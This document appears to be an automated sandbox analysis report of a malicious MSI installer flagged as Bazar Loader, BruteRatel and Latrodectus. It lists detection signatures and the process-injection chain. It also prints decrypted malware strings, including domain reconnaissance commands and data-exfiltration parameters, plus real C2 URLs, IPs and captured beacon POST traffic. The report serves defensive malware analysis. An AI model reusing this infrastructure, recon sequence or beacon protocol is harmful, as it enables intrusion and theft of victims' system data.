Windows Analysis Report
das.msi

Overview

General Information

Sample name: das.msi
Analysis ID: 1525187
MD5: 3cb6b99b20930ac0dbadc10899dc511e
SHA1: 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
SHA256: ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
Tags: BruteRatelBruteRatelmsiuser-k3dg3___

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • msiexec.exe (PID: 7384 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7452 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7500 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIA029.tmp (PID: 7576 cmdline: "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 7632 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7656 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus
{"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
Source | Rule | Description | Author | Strings
00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |

Source | Rule | Description | Author | Strings
6.2.rundll32.exe.16ad2750000.4.raw.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
6.2.rundll32.exe.16ad2700000.2.raw.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
6.2.rundll32.exe.16ad2750000.4.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |

                  System Summary

                  Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7656, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4056, ProcessName: explorer.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol

                  AV Detection

                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
                  Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c ipconfig /all
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c systeminfo
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c nltest /domain_trusts
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net view /all
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net view /all /domain
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &ipconfig=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net group "Domain Admins" /domain
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c net config workstation
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /c whoami /groups
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &systeminfo=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &domain_trusts=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &domain_trusts_all=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_view_all_domain=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_view_all=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_group=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &wmic=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_config_ws=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &net_wmic_av=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &whoami_group=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "pid":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%d",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "proc":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%s",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "subproc": [
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &proclist=[
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "pid":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%d",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "proc":
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%s",
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "subproc": [
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &desklinks=[
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: *.*
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "%s"
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Update_%x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Custom_update
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: .dll
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: .exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Error
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: runnung
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %s/%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: front
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: /files/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Alpha
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Cookie:
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: POST
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: GET
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: curl/7.88.1
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: CLEARURL
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: URLS
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: COMMAND
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: ERROR
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: [{"data":"
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: "}]
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: &dpost=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: https://isomicrotich.com/test/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: https://opewolumeras.com/test/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: \*.dll
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: AppData
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Desktop
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Startup
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Personal
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Local AppData
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: %s%d.dll
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: <!DOCTYPE
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: Content-Length: 0
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: <html>
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: Content-Type: application/dns-message
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: Content-Type: application/ocsp-request
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: 12345
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: 12345
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: &stiller=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: %s%d.exe
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: %x%x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: &mac=
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: %02x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: :%02x
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: &computername=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: &domain=%s
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: LogonTrigger
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: \Registry\Machine\
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: TimeTrigger
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: PT0H%02dM
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: PT0S
                  Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack String decryptor: \update_data.dat
                  Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:62255 version: TLS 1.2
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp, vierm_soft_x64.dll.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\System32\msiexec.exe File opened: z:
                  Source: C:\Windows\System32\msiexec.exe File opened: x:
                  Source: C:\Windows\System32\msiexec.exe File opened: v:
                  Source: C:\Windows\System32\msiexec.exe File opened: t:
                  Source: C:\Windows\System32\msiexec.exe File opened: r:
                  Source: C:\Windows\System32\msiexec.exe File opened: p:
                  Source: C:\Windows\System32\msiexec.exe File opened: n:
                  Source: C:\Windows\System32\msiexec.exe File opened: l:
                  Source: C:\Windows\System32\msiexec.exe File opened: j:
                  Source: C:\Windows\System32\msiexec.exe File opened: h:
                  Source: C:\Windows\System32\msiexec.exe File opened: f:
                  Source: C:\Windows\System32\msiexec.exe File opened: b:
                  Source: C:\Windows\System32\msiexec.exe File opened: y:
                  Source: C:\Windows\System32\msiexec.exe File opened: w:
                  Source: C:\Windows\System32\msiexec.exe File opened: u:
                  Source: C:\Windows\System32\msiexec.exe File opened: s:
                  Source: C:\Windows\System32\msiexec.exe File opened: q:
                  Source: C:\Windows\System32\msiexec.exe File opened: o:
                  Source: C:\Windows\System32\msiexec.exe File opened: m:
                  Source: C:\Windows\System32\msiexec.exe File opened: k:
                  Source: C:\Windows\System32\msiexec.exe File opened: i:
                  Source: C:\Windows\System32\msiexec.exe File opened: g:
                  Source: C:\Windows\System32\msiexec.exe File opened: e:
                  Source: C:\Windows\System32\msiexec.exe File opened: c:
                  Source: C:\Windows\System32\msiexec.exe File opened: a:
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: 4_2_00F6AF79 FindFirstFileExW,4_2_00F6AF79
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,9_2_00F2A8E0
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,9_2_00F22B28

                  Networking

                  Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62255 -> 188.114.97.3:443
                  Source: C:\Windows\System32\rundll32.exe Network Connect: 82.115.223.39 8041
                  Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 443
                  Source: C:\Windows\System32\rundll32.exe Network Connect: 80.78.24.30 8041
                  Source: Malware configuration extractor URLs: https://isomicrotich.com/test/
                  Source: Malware configuration extractor URLs: https://opewolumeras.com/test/
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49701
                  Source: global traffic TCP traffic: 192.168.2.7:49701 -> 80.78.24.30:8041
                  Source: global traffic TCP traffic: 192.168.2.7:57458 -> 82.115.223.39:8041
                  Source: Joe Sandbox View IP Address: 188.114.97.3
                  Source: Joe Sandbox View IP Address: 82.115.223.39
                  Source: Joe Sandbox View IP Address: 80.78.24.30
                  Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View ASN Name: MIDNET-ASTK-TelecomRU
                  Source: Joe Sandbox View ASN Name: CYBERDYNELR
                  Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
